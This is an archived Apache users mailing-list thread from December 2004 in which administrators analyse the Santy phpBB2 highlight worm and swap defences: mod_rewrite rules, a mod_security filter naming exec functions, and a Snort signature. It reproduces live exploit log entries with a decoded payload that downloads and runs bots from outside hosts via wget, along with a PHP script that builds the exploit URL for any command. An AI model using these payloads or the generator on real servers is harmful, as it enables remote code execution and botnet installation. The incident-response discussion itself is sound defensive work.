> >At 15:28 -0500 23/12/2004, Ofer Shezaf wrote:
> >>
> >>Interestingly enough the worm was probably developed on *nix and than
> >>checked and corrected to work on Windows:
> >>
> >> eval{
> >> while(my @a = getpwent()) { push(@dirs, $a[7]);}
> >> };
> >>
> >> push(@dirs, '/ ');
> >>
> >>the getpwent function is not supported on Windows. Actually the entire
> >>loop that gets users home directories from the /etc/passwd file is very
> >>*nix centric.
> >>
> >>The author found that out, added the eval statement to prevent the
> >>script from crashing on Windows and added the root directory in order to
> >>have at least one entry on windows. This last line actually makes the
> >>entire loop less important.
> >>
> >>Additionally, on Windows the worm would affect files on a single disk.
> >>As to which disk exactly, it probably depends on the web server
> >>attacked, and how PHP and Perl are installed and used with the web
> >>server. In some cases, if the web sites and the software do not reside
> >>on the same disk, the worm payload will not work.
> >>
> >>
> >>Ofer Shezaf, CTO
> >>Breach Security, Inc.
> >>Deployable Application Security
> >>
> >>Tel: +972.9.956.0036 ext.212
> >>Cell: +972.54.443.1119
> >>ofers@breach.com
> >
> >At 13:59 +0100 23/12/2004, Anders Henke wrote:
> >> > If you cannot fix it (virtual servers) fast for all your clients you could
> >>> also try with something like this:
> >>>
> >>> RewriteEngine On
> >>> RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
> >>> RewriteCond %{QUERY_STRING} ^(.*)esystem(.*)
> >>> RewriteRule ^.*$ - [F]
> >>>
> >>> We had some vhosts where this worked just fine. On our systems we didnt
> >>> see any valid request with echr and esystem, just be gentle with it, it
> >>> works for me, it could work for you ;)
> >>
> >>This assumes you're seeing GET-requests, but there are other ways
> >>(e.g. POST) to exploit such code.
> >>
> >>GET-requests are so kind as they do show up in full in the web servers
> >>access-log and as such, they do document the full exploit code.
> >>E.g. just the accesslogs do provide enough information for site owner and
> >>administrator to find out what's exactly broken and enables them to
> >>perform detailed analysis on even previously unknown exploits as well
> >>as reject such malicous code within a mod_rewrite-RewriteRule.
> >>
> >>Today, most such exploits are sent using HTTP-GET, but there's a fairly
> >>low expense for exploit code coders to run these exploits using HTTP-POST.
> >>We're lucky that most exploit code coders haven't chosen the struggle to
> >>properly encode their exploit-code HTTP-POST-requests, but still keep
> >>in mind that a 'plain' Apache cannot filter the payload from HTTP-POST
> >>other than rejecting =any= POST-request to 'specific' files like
> >>viewtopic.php, which obviously will sooner or later break some application.
> >>
> >>I've already had a single case where a 'common' insecurity like
> >>'include($some_user_supplied_data)' has been exploited using HTTP-POST,
> >>so for the administrators out there, it might be a good idea to test and
> >>implement mod_security on web servers.
> >>As far as I known, the POST-payload analysis of mod_security is currently
> >>one of the very few ways to audit and stop potentially malicious
> >>HTTP-POST-data from reaching your web server's CGIs.
> >
> >At 16:10 +0000 24/12/2004, <st...@uptime.org.uk> wrote:
> >>
> >>>This assumes you're seeing GET-requests, but there are other ways
> >>
> >>>(e.g. POST) to exploit such code.
> >>
> >>Whilst I understand your point, it should be noted that this
> >>vulnerability in phpBB is susceptible only to GET-based attacks:
> >>the vulnerable data is sourced from $HTTP_GET_VARS.
> >
> >At 19:12 +0100 24/12/2004, Raymond Dijkxhoorn wrote:
> >>
> >>>Whilst I understand your point, it should be noted that this
> >>>vulnerability in phpBB is susceptible only to GET-based attacks:
> >>>the vulnerable data is sourced from $HTTP_GET_VARS.
> >>
> >>And it seems worse, we see even upgraded phpbb2 installs (2.0.11)
> >>succesfully and activly being exploited.
> >>
> >>216.22.10.90 - - [24/Dec/2004:18:42:54 +0100] "GET
> >>/phpBB2/viewtopic.php?t=753&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%
> >>3B%20cd%20/tmp;wget%20civa.org/pdf/bot;perl%20bot;wget%20civa.org/pdf/
> >>ssh.a;perl%20ssh.a%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527
> >>.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53
> >>%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 12758 "-"
> >>"LWP::Simple/5.803"
> >>66.152.98.103 - - [24/Dec/2004:19:02:15 +0100] "GET
> >>/phpBB2/viewtopic.php?t=753&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%
> >>3B%20cd%20/tmp;wget%20civa.org/pdf/bot;perl%20bot;wget%20civa.org/pdf/
> >>ssh.a;perl%20ssh.a%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527
> >>.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53
> >>%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 12758 "-"
> >>"LWP::Simple/5.79"
> >>64.62.187.10 - - [24/Dec/2004:19:04:11 +0100] "GET
> >>/phpBB2/viewtopic.php?t=817&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%
> >>3B%20cd%20/tmp;wget%20civa.org/pdf/bot;perl%20bot;wget%20civa.org/pdf/
> >>ssh.a;perl%20ssh.a%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527
> >>.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53
> >>%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 68131 "-"
> >>"LWP::Simple/5.63"
> >>[24/Dec/2004:19:09:26 +0100] "GET
> >>/phpBB2/viewtopic.php?p=7222&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F
> >>%3B%20cd%20/tmp;wget%20civa.org/pdf/bot;perl%20bot;wget%20civa.org/pdf
> >>/ssh.a;perl%20ssh.a%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%252
> >>7.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%5
> >>3%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 20767 "-"
> >>"LWP::Simple/5.803"
> >>205.214.85.184 - - [24/Dec/2004:19:10:18 +0100] "GET
> >>/phpBB2/viewtopic.php?p=7222&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F
> >>%3B%20cd%20/tmp;wget%20civa.org/pdf/bot;perl%20bot;wget%20civa.org/pdf
> >>/ssh.a;perl%20ssh.a%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%252
> >>7.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%5
> >>3%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 20875 "-"
> >>"LWP::Simple/5.802"
> >>
> >>Loads of those, and all request the files from civa.org
> >>
> >>This is on a patched phpbb2, so be aware!!
> >
> >
> >
>
>
> rgds
>
>
>
> >Do anybody have any ideas on this e-mail? My admin inbox was full
> >of these e-mails this morning, I don't know if
> >they're for real, or what... Can someone please advice? There is
> >one phpbb running on the server...
> >
> >
> >HEADERS:
> >
> >Return-Path: <ww...@iris>
> >Received: from mail.the-server.net ([unix socket])
> > by iris (Cyrus v2.1.15) with LMTP; Sat, 25 Dec 2004 00:50:24 +0100
> >X-Sieve: CMU Sieve 2.2
> >Received: from localhost (localhost [127.0.0.1])
> > by mail.the-server.net (Postfix) with ESMTP id D8D11CA8E;
> > Sat, 25 Dec 2004 00:50:23 +0100 (CET)
> >Received: from mail.the-server.net ([127.0.0.1])
> > by localhost (iris [127.0.0.1]) (amavisd-new, port 10024) with LMTP
> > id 13131-05-2; Sat, 25 Dec 2004 00:48:50 +0100 (CET)
> >Received: by mail.the-server.net (Postfix, from userid 30)
> > id 00F16C874; Sat, 25 Dec 2004 00:48:48 +0100 (CET)
> >Date: Sat, 25 Dec 2004 00:48:48 +0100
> >To: postmaster, hostmaster, abuse, admin, root
> >Subject: YOUR SERVER HAS BEEN HACKED
> >Message-ID: <41...@iris.the-server.net>
> >User-Agent: nail 10.5 4/27/03
> >MIME-Version: 1.0
> >Content-Type: text/plain; charset=us-ascii
> >Content-Transfer-Encoding: 7bit
> >From: wwwrun (WWW daemon apache)
> >X-Virus-Scanned: by Kaspersky, NOD32 & F-Secure at the-server.net
> >
> >
> >MESSAGE BODY:
> >
> >YOUR SERVER HAS BEEN OWNED VIA PHPBB, PLEASE UPGRADE PHP AND PHPBB IMMEDIATELY
> >
> >
> >---------------------------------------------------------------------
> >The official User-To-User support forum of the Apache HTTP Server Project.
> >See <URL:http://httpd.apache.org/userslist.html> for more info.
> >To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> > " from the digest: users-digest-unsubscribe@httpd.apache.org
> >For additional commands, e-mail: users-help@httpd.apache.org
>
>
> ---------------------------------------------------------------------
> The official User-To-User support forum of the Apache HTTP Server Project.
> See <URL:http://httpd.apache.org/userslist.html> for more info.
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> " from the digest: users-digest-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: [users@httpd] Is this for real?
Posted by Dave Floyd <da...@pa.press.net>.
Anders,
Sadly this is quite likely. See the appended messages for more details:
At 20:23 +1100 21/12/2004, L. Walker wrote:
>Date: Tue, 21 Dec 2004 20:23:11 +1100 (EST)
>Subject: Worm hitting PHPbb2 Forums
>From: "L. Walker" <lw...@magi.net.au>
>To: incidents@securityfocus.com
>Cc: full-disclosure@lists.netsys.com
>
>Just spotted two clients hit by this. One client didnt update his
>software (PHP 4.3.4, Apache 1.3.22) and was rootkitted by generation 16.
>Chkrootkit says its Adore, however could be something else. Datacenter
>wasn't very smart and has since wiped the server, so no binaries or other
>evidence.
>
>Generation 12 only wiped out PHP files, replacing them with its own
>message on other client's PHPbb2 forum. Access logs show:
>
>66.220.28.92 - - [21/Dec/2004:18:07:17 +1100] "GET
>/forum/viewtopic.php?p=1445&sid=d2260869a73fb5aca2aed0d8a88cf55a&high
>light=%2527%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108)
>%252echr(32)%252echr(45)%252echr(101)%252echr(32)%252echr(34)%252echr(
>111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252echr(79)%25
>2echr(85)%252echr(84)%252echr(44)%252echr(113)%252echr(40)%252echr(62)
>%252echr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252ech
>r(111)%252echr(102)%252echr(41)%252echr(32)%252echr(97)%252echr(110)%2
>52echr(100)%252echr(32)%252echr(112)%252echr(114)%252echr(105)%252echr
>(110)%252echr(116)%252echr(32)%252echr(113)%252echr(40)%252echr(72)%25
>2echr(89)%252echr(118)%252echr(57)%252echr(112)%252echr(111)%252echr(5
>2)%252echr(122)%252echr(51)%252echr(106)%252echr(106)%252echr(72)%252e
>chr(87)%252echr(97)%252echr(110)%252echr(78)%252echr(41)%252echr(34))%
>252e%2527
>HTTP/1.0" 200 270
>"http://www.noobforces.net/forum/viewtopic.php?p=1445&sid=d2260869a73
>fb5aca2aed0d8a88cf55a&highlight=%2527%252Esystem(chr(112)%252echr(101)
>%252echr(114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252ech
>r(32)%252echr(34)%252echr(111)%252echr(112)%252echr(101)%252echr(110)%
>252echr(32)%252echr(79)%252echr(85)%252echr(84)%252echr(44)%252echr(11
>3)%252echr(40)%252echr(62)%252echr(109)%252echr(49)%252echr(104)%252ec
>hr(111)%252echr(50)%252echr(111)%252echr(102)%252echr(41)%252echr(32)%
>252echr(97)%252echr(110)%252echr(100)%252echr(32)%252echr(112)%252echr
>(114)%252echr(105)%252echr(110)%252echr(116)%252echr(32)%252echr(113)%
>252echr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)%252echr(1
>12)%252echr(111)%252echr(52)%252echr(122)%252echr(51)%252echr(106)%252
>echr(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(78)
>%252echr(41)%252echr(34))%252e%2527"
>"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
>
>--
>L. Walker <lwalker at magi dot net dot au>
>Network Administrator / Consultant
>--
>
>>At 12:46 -0500 21/12/2004, Christopher Adickes wrote:
>
>In addition to your post here is some more info.
>
>http://isc.sans.org/
>
>>At 10:47 -0700 21/12/2004, mark@onnow.net wrote:
>
>Front what I have read, this can happen in any phpbb version lower than 2.0.11
>
>This exploit is becoming frequent. Normally uploading a ddos bot.
>>
>>At 12:53 -0500 21/12/2004, Chris Ess wrote:
>>
>>Generation 9 appears to overwrite files with the following extensions:
>>.htm, .php, .asp, .shtm, .jsp, .phtm
>>
>>It only displays a defacement message saying
>>
>>"NeverEverNoSanity WebWorm generation #"
>>
>>Where # is the generation of the worm.
>>
>>This bug only exploits a hole in phpBB2 as far as I can tell. It does not
>>appear to exploit a hole within PHP. In order to protect yourself, you
>>must upgrade phpBB2 to version 2.0.11. See
>>http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513
>>
>>The only code modification that this worm appears to do is increments its
>>generation count every time it hits a server. Generation 9 does not
>>contain anything that would indicate the ability to install a rootkit. I
>>suspect that the rootkit may have been installed separately.
>>
>>I extracted a full copy of generation 9 of this worm based on the access
>>logs of a site hit by it. I was going to do a code review whenever I got
>>the chance to properly do one.
>>
>>Sincerely,
>>
>>
>>Chris Ess
>System Administrator / CDTT (Certified Duct Tape Technician)
>
>>At 11:29 -0700 21/12/2004, lists <li...@innocence-lost.net> wrote:
>
>Funny enough, I got a message from a former employer about this worm
>yesterday- a box I had setup that had hardened php on it got hit hard by
>this worm. I must've misread the advisory as I was under the impression
>that the Hardened PHP patches protected PHP through canary values from
>this bug? Or does it use more than just unserialize() (i.e. realpath() )
>
>>At 14:14 -0500 21/12/2004, Chris Ess wrote:
>
>> Funny enough, I got a message from a former employer about this worm
>> yesterday - a box I had setup that had hardened php on it got hit hard by
>> this worm. I must've misread the advisory as I was under the impression
>> that the Hardened PHP patches protected PHP through canary values from
>> this bug? Or does it use more than just unserialize() (i.e. realpath() )
>
>This worm appears to have nothing to do with the bugs fixed in versions
>4.3.10 and 5.0.3 of PHP.
>
>The bug occurs in this line in viewtopic.php in phpBB2:
>(Formatting changed to make it look pretty. It's line 1109 in phpBB2
>2.0.10)
>
>$message = str_replace('\"', '"',
> substr(preg_replace('#(\>(((?>([^><]+|(?R)))*)\<))#se',
> "preg_replace('#\b(" . $highlight_match . ")\b#i',
> '<span style=\"color:#"
> . $theme['fontcolor3'] . "\"><b>\\\\1</b></span>', '\\0')", '>' .
> $message . '<'), 1, -1));
>
>The 'e' flag on the regex pattern tells it to interpret the statement as
>valid PHP code and run it. (Reference is:
>http://www.php.net/manual/en/reference.pcre.pattern.modifiers.php)
>
>The bug that is exploited works in such a way that it actually runs the
>command that is passed through the highlight GET variable. I'm not 100%
>sure how this works since I haven't had the chance to correlate the
>strings recorded in apache's access log with the above code.
>
>>At 12:21 -0700 21/12/2004, lists wrote:
>
>Yea good catch, after looking into it a little further I found that it
>wasn't related to that advisory, but rather to one from 11.13.04, the
>exploit code of the original bug can be found on k-otik.com
>
>Thanks for the info
>
>>At 21:00 +0000 21/12/2004, Barrie Dempster <ba...@reboot-robot.net> wrote:
>
>More information:
>
>Mis-reported and then corrected at the ISC -
>http://isc.sans.org/diary.php?date=2004-12-21
>
>* The advisory is here - htp://howdark.com/
>(it was there when the advisory was initially released but that site
>seems down atm, included here in hope that howdark.com resurfaces)
>
>* The fix is here - http://www.phpbb.com/phpBB/viewtopic.php?t=240513
>
>* The exploit is here - http://www.howdark.com/poc/phpbb2010_hl.phps
>(down as above, but included here as it was the original source, try
>here http://www.k-otik.com/exploits/20041122.r57phpbb2010.pl.php )
>
>* SNORT Rule is here - http://www.webservertalk.com/message554529.html
>
>* If you got owned by this then your Christmas present is here
>http://ysati.com hehe ;-P
>
>With Regards..
>Barrie Dempster (zeedo) - Fortiter et Strenue
>
>>At 13:28 -0500 21/12/2004, Mike <mi...@shaw.ca> wrote:
>
>Does this affect PHPBB2 in general, or is it platform specific as well?
>
>>At 19:53 -0500 21/12/2004, M. Shirk wrote:
>
>I missed an important "F" on my previous post for these snort sigs.
>
>alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS
>(msg:"BLEEDING-EDGE phpBB Highlighting Code Execution - Santy.A
>Worm"; flow:to_server,established; uricontent:"/viewtopic.php?";
>nocase; uricontent:"&highlight='.fwrite(fopen("; nocase;
>reference:url,www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513;
>sid:9999999; rev:1;)
>
>Shirkdog
>http://www.shirkdog.us
>
>
At 15:51 -0800 20/12/2004, Shannon Lee wrote:
>X-VirusChecked: Checked
>X-Env-Sender: bugtraq-return-17330-dave.floyd=pa.press.net@securityfocus.
> com
>X-StarScan-Version: 5.4.5; banners=-,-,-
>X-Originating-IP: [205.206.231.26]
>X-SpamWhitelisted: domain whitelist
>Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
>List-Id: <bugtraq.list-id.securityfocus.com>
>List-Post: <ma...@securityfocus.com>
>List-Help: <ma...@securityfocus.com>
>List-Unsubscribe: <ma...@securityfocus.com>
>List-Subscribe: <ma...@securityfocus.com>
>Delivered-To: mailing list bugtraq@securityfocus.com
>Delivered-To: moderator for bugtraq@securityfocus.com
>Date: Mon, 20 Dec 2004 15:51:13 -0800
>From: Shannon Lee <sh...@webhostworks.net>
>User-Agent: Mozilla Thunderbird 0.7.3 (X11/20040803)
>X-Accept-Language: en-us, en
>To: bugtraq@securityfocus.com
>Subject: phpBB Worm
>
>This morning one of our client's sites was found to have been defaced
>with the words "NeverEverNoSanity WebWorm Generation 9." The defacement
>appeared to take place on all .html files in the web root trees of
>multiple virtual hosts on the web server in a very short period of time.
>
>After some investigation, we determined that the attacker had gained
>access via phpbb in a series of crafted URL requests, like so:
>
>64.235.234.84 - - [20/Dec/2004:08:41:35 -0800] "GET
>/viewtopic.php?p=9002&sid=f5
>399a2d243cead3a5ea7adf15bfc872&highlight=%2527%252Efwrite(fopen(chr(1
>09)%252echr
>(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102),
>chr(97)),ch
>r(35)%252echr(33)%252echr(47)%252echr(117)%252echr(115)%252echr(114)%
>252echr(47)
>%252echr(98)%252echr(105)%252echr(110)%252echr(47)%252echr(112)%252ec
>hr(101)%252
>echr(114)%252echr(108)%252echr(10)%252echr(117)%252echr(115)%252echr(
>101)%252ech
>r(32)),exit%252e%2527 HTTP/1.0" 200 13648 "http://forum.CLIENT SITE
>OMITTED.com/
>viewtopic.php?p=9002&sid=f5399a2d243cead3a5ea7adf15bfc872&highlight=%
>2527%252Efw
>rite(fopen(chr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)
>%252echr(11
>1)%252echr(102),chr(97)),chr(35)%252echr(33)%252echr(47)%252echr(117)
>%252echr(11
>5)%252echr(114)%252echr(47)%252echr(98)%252echr(105)%252echr(110)%252
>echr(47)%25
>2echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(10)%252echr
>(117)%252ec
>hr(115)%252echr(101)%252echr(32)),exit%252e%2527" "Mozilla/4.0
>(compatible; MSIE 6.0; Windows NT 5.1)"
>
>After checking the phpbb site, it turns out that this is a vulnerability
>posted the 18th of November, called Hilight; we didn't update to prevent
>it because the client whose domain it was has their own admin, and we
>thought he was taking care of phpBB. Oops. The exploit is described here:
>
>http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513
>
>When I copied all these entries out of the log and translated the chr()
>calls, they turned out to be the attached perl script, which is capable
>of finding .html files to deface, and then going to google and finding
>more instances of phpbb to infect. Which makes it a worm. It also
>tracks itself by generation; we were generation 9.
>
>Please find attached the above-mentioned script as well as the series of
>log entries from access_log.
>
>--Shannon
>
>
>
>At 23:28 +0100 21/12/2004, Raymond Dijkxhoorn wrote:
>>
>>If you cannot fix it (virtual servers) fast for all your clients
>>you could also try with something like this:
>>
>> RewriteEngine On
>> RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
>> RewriteCond %{QUERY_STRING} ^(.*)esystem(.*)
>> RewriteRule ^.*$ - [F]
>>
>>We had some vhosts where this worked just fine. On our systems we
>>didnt see any valid request with echr and esystem, just be gentle
>>with it, it works for me, it could work for you ;)
>
>At 15:11 -0500 21/12/2004, Paul Kurczaba wrote:
>>
>>It seems that a good number of sites have been compromised due to this
>>exploit. Doing a search for "NeverEverNoSanity WebWorm Generation" on google
>>revealed nothing. But, when I did the same search on the new MSN beta search
>>engine, a whopping 36,000 hits showed up. Check it out:
>>http://beta.search.msn.com/results.aspx?q=%22NeverEverNoSanity+WebWo
>>rm+Generation%22&FORM=QBRE
>
>At 12:22 +0100 22/12/2004, Sebastian Wiesinger <bo...@fire-world.de> wrote:
>> > We had some vhosts where this worked just fine. On our systems we didnt
>>> see any valid request with echr and esystem, just be gentle with it, it
>>> works for me, it could work for you ;)
>>
>>If you use mod_security, this may help, too:
>>
>>SecFilterSelective "THE_REQUEST"
>>"(system|exec|passthru|popen|shell_exec|proc_open|fopen|fwrite)\s*\("
>> >>
>>I had another exploit attempt, with this payload:
>>
>>66.119.13.4 - - [22/Dec/2004:10:06:47 +0100] "GET
>>/forum/viewtopic.php?t=%37&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3
>>B%20%63%64%20%2F%74%6D%70%3B%77%67%65%74%20%31%32%38%2E%31%37%34%2E%31
>>%33%37%2E%32%33%30%2F%62%6E%20%2D%4F%20%2E%62%3B%20%70%65%72%6C%20%2D%
>>70%65%20%79%2F%74%68%6D%76%64%77%30%39%38%37%36%35%34%33%32%31%75%6F%6
>>9%65%61%2F%61%65%69%6F%75%31%32%33%34%35%36%37%38%39%30%77%64%76%74%68
>>%6D%2F%20%2E%62%7C%20%70%65%72%6C%3B%20%72%6D%20%2D%66%20%2E%62%20%2A%
>>2E%70%6C%20%62%30%74%2A%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=
>>%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%
>>52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 12266 "-" "-"
>>
>>Which decodes to:
>>
>>rush=echo _START_; cd /tmp;wget 128.174.137.230/bn -O .b; perl -pe
>>y/thmvdw0987654321uoiea/aeiou1234567890wdvthm/ .b| perl; rm -f .b
>>*.pl b0t*; echo _END_
>>highlight='.passthru($HTTP_GET_VARS[rush]).'
>>
>>Regards,
>>
>>Sebastian
>
>At 17:21 +0200 22/12/2004, Alexander Klimov <al...@inbox.ru> wrote:
>>
>>It seems that automated exploiting starts soon after disclosure of the
>>vulnerability:
>>
>>62.221.209.145 - - [24/Nov/2004:14:09:05 +0200]
>>"GET /viewtopic.php?t=50674&highlight=
>>%2527%252esystem(chr(100)%252echr(105)%252echr(114))%252edie()%252e%2527
>>HTTP/1.1" 404 219
>>
>>Interestingly, we do not use phpbb and in fact do not have
>>viewtopic.php at all.
>
>At 4:34 +0000 22/12/2004, <yc...@sneakemail.com> wrote:
>>
>>Forgive me if this is a newbie question, but a site I help run was
>>hit by this, and I'm trying to understand it to protect against
>>future worms.
>>
>>The worm exploits the phpBB highlight vulnerability. It uses PHP
>>to run Perl to write the Perl script file, then executes it. The
>>script then proceeds to traverse the entire directory structure,
>>overwriting .php, .htm, .shtm, .phtm, and on our server, .ssi
>>files, and then spreads itself. Correct?
>>
>>I have two questions:
>>
>>1. Why has the worm been as effective on Windows servers as on
>>*nix servers? At the very least, shouldn't the difference in file
>>and directory naming cause a problem? I looked at the decoded Perl
>>script, but I'm not a Perl expert, so I couldn't understand all of
>>it. And what about the difference in file permissions?
>>
>>2. More importantly, why wasn't the worm's destructive ability
>>limited by file permissions, especially on *nix servers? If, for
>>example, an HTML file on the server was uploaded by user bob, and
>>has permissions of 755, how can the Perl script delete that file?
>>Shouldn't the Perl script be created with the Perl process's
>>permissions, which was invoked by PHP, which should have the Web
>>server's permissions, which should be, at least on most *nix
>>servers, the nobody user?
>>
>>This is a big issue on shared servers, or virtual hosts, whatever
>>you want to call them. Our site is on a shared server, and our
>>site does not even run phpBB, but most of our HTML files were
>>replaced with the worm's content. Obviously, then, another site on
>>the server must have an old version of phpBB. But why could the
>>worm, coming in through another site, modify files created by other
>>users? Even if the worm's script ran as the owner of the
>>vulnerable viewtopic.php file, how could it then modify
>>non-world-writable files created by other users?
>>
>>I have long been concerned with the security of PHP scripts,
>>especially on shared servers. Since PHP almost always runs as an
>>Apache module, and Apache usually runs as nobody, one must make
>>files and directories world-writable for PHP scripts to be able to
>>write to them. But that means that any process on the server,
>>including anyone's PHP script, can modify the files.
>>
>>Thanks for any insights.
>>
>>Adam Porter
>
>At 21:28 -0600 22/12/2004, Alvin Packard wrote:
>>
>>Last look at my log files and I was hit a total of 421 times by 278
>>different IPs. It seems to be moving rather quickly as these were from
>>the last 2 days. Good luck to those who have not patched yet.
>>
>>Alvin Packard, CWNA
>>www.networksecuritytech.com
>
>At 13:31 +0100 23/12/2004, Anders Henke wrote:
>> > 1. Why has the worm been as effective on Windows servers as on
>>*nix servers? At the very least, shouldn't the difference in file
>>and directory naming cause a problem? I looked at the decoded Perl
>>script, but I'm not a Perl expert, so I couldn't understand all of
>>it. And what about the difference in file permissions?
>>
>>Perl does provide cross-platform-functions for e.g. file access and
>>there's usually not much of a difference for running a well-written
>>perl script on Unix as well as on Windows other than the first line
>>(usually '#!c:\perl\perl.exe -w' on Windows and '#! /usr/bin/perl -w'
>>on Unix).
>>
>>However, most Windows-Webservers other than Apache do run any .pl-Script
>>using the to-be-installed perl interpreter and don't care on the bang-line.
>>
>>The documentation found in 'perldoc perlport' does give a closer view
>>on the few differences when writing cross-plattform perl scripts.
>>
>>> 2. More importantly, why wasn't the worm's destructive ability
>>>limited by file permissions, especially on *nix servers? If, for
>>>example, an HTML file on the server was uploaded by user bob, and
>>>has permissions of 755, how can the Perl script delete that file?
>>>Shouldn't the Perl script be created with the Perl process's
>>>permissions, which was invoked by PHP, which should have the Web
>>>server's permissions, which should be, at least on most *nix
>>>servers, the nobody user?
>>
>>On shared servers with ISPs caring about security, user CGIs are using the
>>suexec mechanism in order to run each customer within his own user's space.
>>
>>The downside of using suexec is that PHP as a CGI doesn't offer a small
>>number of special features some people do believe to be essential, as well
>>as some people do write code in a way that making it work on PHP as CGI
>>is close to 'virtually impossible'. The PHP-Module also allows one to
>>set PHP-configuration settings via .htaccess; those configuration
>>changes are also ignored by CGI-PHP and can severely affect the way
>>an PHP-written application works (or doesn't work).
>>
>>> This is a big issue on shared servers, or virtual hosts, whatever
>>>you want to call them. Our site is on a shared server, and our
>>>site does not even run phpBB, but most of our HTML files were
>>>replaced with the worm's content. Obviously, then, another site
>>>on the server must have an old version of phpBB. But why could
>>>the worm, coming in through another site, modify files created by
>>>other users? Even if the worm's script ran as the owner of the
>>>vulnerable viewtopic.php file, how could it then modify
>>>non-world-writable files created by other users?
>>
>>
>>
>>Right - if everyone were using e.g. suexec, this would be the case.
>>
>>As a web host, you've got to chose to run either CGI-PHP or PHP as
>>module.
>>
>>Your 'power'-users are calling for the module, the admin keeping
>>maintenance on an already overloaded server does also all for the module
>>(the module relieves the web server from forking a seperate process for
>>running a php-script), only those security-related ones are rejecting both
>>mod_perl as well as mod_php and favour 'true' CGIs via suexec.
>>
>>If your scripts support the fastcgi extension, one might use mod_fastcgi
>>with suexec support; however, this means one has to setup three softwares
>>(fastcgi, suexec, php) and make them work together instead of the
>>often-recommended 'add mod_php'-Oneliner. As a result, you're spending
>>much work on a secure system, but your users are still calling for mod_php
>>and in case any part of your setup breaks, your whole system is unusable.
>>
>>> I have long been concerned with the security of PHP scripts,
>>>especially on shared servers. Since PHP almost always runs as an
>>>Apache module, and Apache usually runs as nobody, one must make
>>>files and directories world-writable for PHP scripts to be able to
>>>write to them. But that means that any process on the server,
>>>including anyone's PHP script, can modify the files.
>>
>>
>>Yes, you've got the point.
>>
>>Apache 2 has the ability to run modules per VirtualHost within a different
>>user context (perchild MPM).
>>-According to the Apache documentation, this module is non-functional,
>> not yet finished and development is not currently active.
>>-PHP is certainly one of the most interesting modules for this feature,
>> however, the last time I looked, exactly PHP didn't support it and Apache
>> required to have at least one process running per virtualhost (which in
>> turn would render servers hosting thousands of sites unusable).
>>-Still today, the php documentation warns from using Apache 2.0 with PHP
>> in productive environment.
>>
>>>From a security aspect, the only way for running PHP securely
>>(with 'secure' from the view of the administrator), CGI is currently
>>the only way to do so.
>>
>>
>>
>>Regards,
>>
>>Anders
>>--
>>Schlund + Partner AG Security and System Administration
>>Brauerstrasse 48 v://49.721.91374.50
>>D-76135 Karlsruhe f://49.721.91374.225
>
>At 23:34 +0000 22/12/2004, William Geoghegan wrote:
>>
>>A script to check if your phpBB is vulnerable.
>>Anything below 2.0.11 _probably_ is but incase your not sure, use
>>this script.
>>
>>The script generates the request parameters, all you need to do is
>>copy the result onto www.thesite.com/viewtopic.php
>>
>>
>><?
>>$rush='ls -al'; //do what
>>$highlight='passthru($HTTP_GET_VARS[rush])'; // dont touch
>>
>>print "?t=%37&rush=";
>>
>>for ($i=0; $i<strlen($rush); ++$i) {
>> print '%' . bin2hex(substr($rush,$i,1));
>>}
>>
>>print "&highlight=%2527.";
>>
>>for ($i=0; $i<strlen($highlight); ++$i) {
>> prt '%' . bin2hex(substr($highlight,$i,1));
>>}
>>
>>print ".%2527";
>>?>
>>
>>Cheers.
>>
>>William Geoghegan
>>
>>GEOTEK Computer Services
>>- www.geotekcs.co.uk -
>
>At 15:28 -0500 23/12/2004, Ofer Shezaf wrote:
>>
>>Interestingly enough the worm was probably developed on *nix and than
